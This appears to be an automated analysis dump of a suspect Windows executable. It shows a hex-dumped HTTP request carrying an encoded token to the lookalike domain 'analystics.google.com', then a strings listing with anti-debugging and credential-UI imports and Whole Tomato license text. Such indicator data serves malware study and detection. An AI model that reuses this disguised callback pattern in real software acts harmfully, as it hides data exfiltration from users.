3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 7745306b 596f4773 36416b56 61204854 wE0kYoGs6AkVa HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com....
Strings
P.rsrcVtratceuritorla \ .CC }Z.A.Z. . . .. zn . .. .P . 3+KDk \/Ej~ H ((((( H h(((( H ICON1 ICON2 ICON3 jH'K kernel32.dll KERNEL32.DLL LRK: mscoree.dll WJ*D YANDEX SEARCHENG ,-(<"> @@@\&&& %%%%%!' %%%%%$ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 0A@@Ju 0OP=B$ 0SSSSS 0xS&fA 1ZJ;s&r 21` bl :2hHCbE :3106#O%X 3"N\q_|A 3x5(?( ;4<FtE 4^k"p=j 4rRwPx 4Y ^9o- -5128~ 56y+#4 ?5cMQF 5RTC/4O 5u$c$iO 6*9<N3 +6a/0ONXc (6aEsF 6=>H9>C 6Q \W8 7~*67~# 7OIqS{ 7Uwd'I 7y+tB 8Bs5=> 8c[VW1 8{ -Cx 94<Mjzo 9 !ELb 9XTITC a3(2w. >>AA===Y] A!B])B abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ADMQCFZQ AH!g~zU ;[A_~%i,sg~ A;<J*. An application has made an attempt to load the C runtime library incorrectly. - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August :Aw:c5 ^a.:wk )/"B4x Baa c, b},BH-< BeginPaint {BH%W+| BMRU-3 $%B~o7! B<TUDI[kq C(.|} ]c2DmH >>CAAGGF CCC\HHH@EEE+<<< C-e11a CgDv ? ci:Bdz c$$$O...B4444555#000 |c.o)Q CorExitProcess cP!j{~V1^ credui.dll CredUIParseUserNameA - CRT not initialized ,_'C#*T3Y0 cU`eoe @.data dddd, MMMM dd, yyyy December DecodePointer DefWindowProcA DeleteCriticalSection DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. DOMAIN error _>drh` ,DuC'7 \D-/VS \D+/VS e4 5NVi +E5'/E }!Eb7Q XD ~{e`H-zpz EncodePointer EnterCriticalSection eQ03bF ,Eq-s" ExitProcess EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. FCEJZZx| FC %|T February fkg_r& - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue &+:&f,n &FQN*O{ FreeEnvironmentStringsA FreeEnvironmentStringsW Friday [/..fv F`xu&? g/1\*3 \g7J d GCg?:@ GetACP GetActiveWindow GetClientRect GetCommandLineA GetCommandLineW GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetModuleFileNameA GetModuleHandleW GetOEMCP GetProcAddress GetProcessWindowStation GetStartupInfoA GetStdHandle GetStringTypeA GetStringTypeW GetSystemMetrics GetSystemTimeAsFileTime GetTickCount GetUserDefaultLangID GetUserObjectInformationA GetVersion GetVersionExA gJxUNa g<s5.C #GW7vD gw$Vd,) #){h!; h~a']8^}r$O} HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize HH:mm:ss h`L(C}(& h<~]zC I9sdLC &:-IBs$ ifHHeJJZZ[[{| ^I`g~CFQ^^ InitializeCriticalSectionAndSpinCount InterlockedDecrement InterlockedIncrement IsDebuggerPresent IsValidCodePage I[/w&U :*j>>> JanFebMarAprMayJunJulAugSepOctNovDec January J-Bg&IC J#GW~} j@j ^V jK>2( _`j+]v ]]]JXXX0XXX J*z4s]c K'7}C,% {[$>Ke@ KERNEL32.dll KpZU$3 Ktz6ZCT L#~?4zN Last modified: Mayk LCMapStringA LCMapStringW LeaveCriticalSection LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective l(=js5\+ LoadIconW LoadLibraryA LoadStringW lstrcmpiA L(zN1d M7}C,- Mb "RW MessageBoxA m?h2/7 m`hG 7. Microsoft Visual C++ Runtime Library M+kA:W mL*R-] MM/dd/yy Monday MultiByteToWideChar M}$vUm \mw~AA <{])mz n0 wQ na8/2rm NAV]\E} '}Nik}@ N#'j"-\% n{JnZ_~ n&kcx=K nnnSlll3vvv Noay19 - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November ~nvSCWaa$ N'yqBp Nzz(a$bpk+ $'$o1} o^=3 FeR ,/oAB]]UG October OF]]]\\ oftware). OQrUFg P}}}}}}}}}} ,,P0JMu PD)C sT pFZZfq<9; (pG|%t PhY8p PIHIcV:9L PLc5.~9^ Please contact the application's support team for more information. PPPPPPPP PPPPPPPPPPPPP Program: <program name unknown> PS_f~F>EMk - pure virtual function call Qe{ffJJJ[e{ qqq @@@ QRS\,` QueryPerformanceCounter QWRTggitz r 0%,kp \R1@XS r,\%:4 #R5*B3 RA>e\R `.rdata RtlUnwind runtime error Runtime Error! S7'r9T Saturday September SetHandleCount SetLastError SetUnhandledExceptionFilter SING error sk1k$G$ =SOFTu SOFTWARE LICENSE AGREEMENT sQ3Iee srNYZ} ^__SSe Sunday SunMonTueWedThuFriSat S}uu<kcc%XTT }Sv%jh Sw7ys@ SXbEPs sZc,> t.111stt TEMQ^cc TerminateProcess TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. This application has requested the Runtime to terminate it in an unusual way. This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue t"SS9] t$<"u 3 Tuesday ;t$,v- t+WWVPV UA7gr4 !uCYEN UFC=M:Mjo .}UfwY - unable to initialize heap - unable to open console device UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter UQPXY]Y[ URPQQh USER32.dll USER32.DLL Uu#euJ ::: UUU V59ZLu \vE U@ VirtualAlloc VirtualFree v N+D$ V_@o4= vy:.%< )w-.): Wednesday _?w$g/^ :$W=Hu WideCharToMultiByte wiiym^^cMBBKA666" Wl,ogN WriteFile )X9o26 ;}X<KdY X.!:q# {]-xS+}Q xvvwvwx [X\X\Q XXTX\Q y2UN*7 >=Yt1j }Z9j <o] <zc)2) ;*ZjXT3B% zMlfM7f36a